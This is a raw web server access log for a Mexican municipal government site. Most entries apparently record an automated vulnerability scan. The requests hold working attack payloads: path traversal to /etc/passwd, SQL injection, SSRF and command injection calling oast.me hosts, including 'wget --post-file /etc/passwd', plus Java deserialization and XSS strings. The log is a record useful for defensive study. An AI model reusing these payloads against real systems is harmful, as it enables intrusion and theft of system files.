chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:28:53 -0600] "GET /resource/file%3a///etc/passwd/ HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:28:53 -0600] "GET /wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 10.0; rv:88.0) Gecko/20100101 Firefox/88.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:28:54 -0600] "GET /nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5(2095576973))%23 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:28:55 -0600] "GET /api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:28:55 -0600] "GET /img.php?f=/./etc/./passwd HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; CrOS x86_64 14816.131.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:28:56 -0600] "GET /api/experimental/latest_runs HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:29:00 -0600] "GET /../../../../../../../../../../../../etc/passwd HTTP/1.1" 400 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_17) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:34:25 -0600] "GET /wp-content/dup-installer/main.installer.php?is_daws=1 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:56:44 -0600] "GET /monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:56:46 -0600] "GET /cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:56:46 -0600] "GET /uir//etc/passwd HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:56:47 -0600] "GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 404 4677 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:56:49 -0600] "GET /apisix/admin/migrate/export HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:56:51 -0600] "GET /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:56:51 -0600] "GET /api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20cudo29mjalo72u293ingroksf9zetagpy.oast.me) HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.6.25" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:56:52 -0600] "GET /pictureproxy.php?url=file:///etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.9.25" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:56:53 -0600] "GET /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.44 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:56:55 -0600] "GET /pictureproxy.php?url=http://cudo29mjalo72u293ingcp5ds9xgkef13.oast.me HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Debian; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:23:55 -0600] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:23:55 -0600] "GET /access/set?param=enableapi&value=1 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:23:55 -0600] "GET /cgi-bin/logoff.cgi HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/617.2.4 (KHTML, like Gecko) Version/17.3 Safari/617.2.4" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:23:56 -0600] "GET /?filename=../../../../../../etc/passwd&mphb_action=download HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.9.21" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:23:56 -0600] "GET /goforms/menu HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/8.0.0 Version/17.4.1 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:23:56 -0600] "GET /password.html HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.9.21" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:23:56 -0600] "GET /ad-list-search?keyword&keyword&lat&lat&long&long&location&category HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:23:57 -0600] "GET /res/login.jsf?javax.faces.ViewState=rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAKWN1ZG8yOW1qYWxvNzJ1MjkzaW5naXRzbnF4YmJoYTVyYy5vYXN0Lm1ldAAAcQB%2BAAV0AARodHRwcHh0ADBodHRwOi8vY3VkbzI5bWphbG83MnUyOTNpbmdpdHNucXhiYmhhNXJjLm9hc3QubWV4 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:25:58 -0600] "GET /_next/image?w=16&q=10&url=https://cudo29mjalo72u293ingw6zf95mtb5h5q.oast.me HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.21" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:54:52 -0600] "GET /wp-json/h5vp/v1/video/0?id='+union+all+select+concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5(999999999)),2,3,4,5,6,7,8--+- HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_16) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:54:52 -0600] "GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:54:53 -0600] "GET /index.php?option=com_jejob&view=../../../../../../etc/passwd%00 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:54:55 -0600] "GET /wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:54:59 -0600] "GET //interactsh.com%2f.. HTTP/1.1" 404 4677 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:19:23:43 -0600] "GET /page?settings[view%20options][closeDelimiter]=x%22)%3bprocess.mainModule.require(%27child_process%27).execSync(%27wget+http://cudo29mjalo72u293ingihwym1otpyp5x.oast.me%27)%3b// HTTP/1.1" 406 226 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:19:23:45 -0600] "GET /cache/backup/ HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:19:23:46 -0600] "GET /?Express=aaaa&autoEscape&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://cudo29mjalo72u293ingi67qgdkmntbd9.oast.me%27);// HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/616.17 (KHTML, like Gecko) Version/17.3.75 Safari/616.17" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:19:23:47 -0600] "GET /plus/ajax_street.php?act=alphabet&x=11%ef%bf%bd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9%20from%20qs_admin HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:19:23:47 -0600] "GET /webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd HTTP/1.1" 200 13905 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0" chocholayucatan.gob.mx 192.185.131.128 47.128.122.107 - - [01/Feb/2025:19:33:39 -0600] "GET /index.php HTTP/2.0" 406 226 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)" chocholayucatan.gob.mx 192.185.131.128 47.128.61.108 - - [01/Feb/2025:19:49:40 -0600] "GET /robots.txt HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:19:52:06 -0600] "GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 400 25712 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:19:52:06 -0600] "GET /rest/v1/AccountService/Accounts HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:19:52:08 -0600] "GET /hax?jsp=/app/rest/server;.jsp HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:19:52:10 -0600] "GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.4.22" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:19:52:10 -0600] "GET /debug/pprof/goroutine?debug=1 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:19:52:10 -0600] "GET /passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:19:52:13 -0600] "GET /pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName('cudo29mjalo72u293ingzunup3pm9issr.oast.me')}&mgrDn=a&pwd=a HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:19:52:22 -0600] "GET /testrail/files.md5 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" chocholayucatan.gob.mx 192.185.131.128 47.128.50.167 - - [01/Feb/2025:19:57:40 -0600] "GET /robots.txt HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:20:21:30 -0600] "GET /img/../../../../../../etc/passwd HTTP/1.1" 400 25712 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:20:21:30 -0600] "GET /admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,md5('999999999'),5,6,7,8,9,10--+ HTTP/1.1" 406 226 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.127 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:20:21:32 -0600] "GET /fp-content/ HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:20:21:35 -0600] "GET /admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.26" chocholayucatan.gob.mx 192.185.131.128 192.104.34.34 - - [01/Feb/2025:20:37:33 -0600] "GET / HTTP/1.1" 200 87208 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" www.chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:20:50:52 -0600] "GET /conf/nginx.conf HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:20:50:53 -0600] "POST /userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"%f0%9f%a6%9e\":\"test\"} HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.153183" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:20:50:54 -0600] "GET /index.asp HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:20:50:54 -0600] "POST /wp-json/igd/v1/get-users-data HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:20:50:57 -0600] "GET /hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:20:50:58 -0600] "GET /views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:20:51:10 -0600] "GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:20:54:51 -0600] "GET /OA_HTML/ibeCAcpSSOReg.jsp HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:21:19:25 -0600] "GET /adm/file.cgi?next_file=%2fetc%2fpasswd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:21:19:27 -0600] "GET /wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:21:19:28 -0600] "GET /wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:21:19:29 -0600] "GET /current_config/Sha1Account1 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 141.94.145.70 - - [01/Feb/2025:21:22:37 -0600] "GET /.env HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 OPR/60.0.3255.109" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:21:25:36 -0600] "GET /processexecution/DownloadExcelFile/Domain_Credential_Report_Excel HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/617.2.4 (KHTML, like Gecko) Version/17.3 Safari/617.2.4" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:21:25:42 -0600] "GET /processexecution/DownloadExcelFile/Infrastructure_Report_Excel HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.3.17" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:21:25:44 -0600] "GET /processexecution/DownloadExcelFile/Resolver_Report_Excel HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:21:47:39 -0600] "GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA